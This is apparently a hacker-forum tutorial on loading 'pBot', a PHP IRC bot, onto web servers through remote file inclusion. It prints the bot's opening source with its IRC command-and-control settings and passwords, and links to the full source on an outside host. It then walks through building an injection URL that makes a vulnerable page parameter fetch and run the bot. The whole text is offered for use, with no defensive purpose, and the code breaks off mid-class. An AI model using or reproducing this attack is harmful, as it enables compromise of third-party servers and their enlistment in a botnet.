Load Phpbot pbot to web inject

Example Pbot :

set_time_limit(0);
error_reporting(0);
echo "AnaKDompuCrew!!";

class pBot
{
var $config = array("server"=>"irc.indoirc.net",
"port"=>"6667",
"pass"=>"hencarasa",
"prefix"=>"ManieZ|",
"maxrand"=>"4",
"chan"=>"#anakdompu",
"chan2"=>"#shinchi",
"key"=>"anakdompu",
"modes"=>"+p",
"password"=>"hencarasa",
"trigger"=>".",
"hostauth"=>"Shinchi.Memang.Cakep.Walau.Jelek.Tetap.Bilang.Cakep.La"
);
var $users = array();
function start()

All Source Pbot :
http://anakdompu.by.ru/bots/pbot.txt

How To Load Pbot To Web Inject :

1. you must have webhost to save file pbot
2. web inject.

ex :
www.yourhost.com/bots/pbot.txt

www.target.com <-- Target

/frame.php?page= <-- Bug

www.yourhost.com/bots/pbot.txt?? <-- Pbot

Target +Bug+Pbot

www.target.com/frame.php?page=http://yourhost.com/bots/pbot.txt??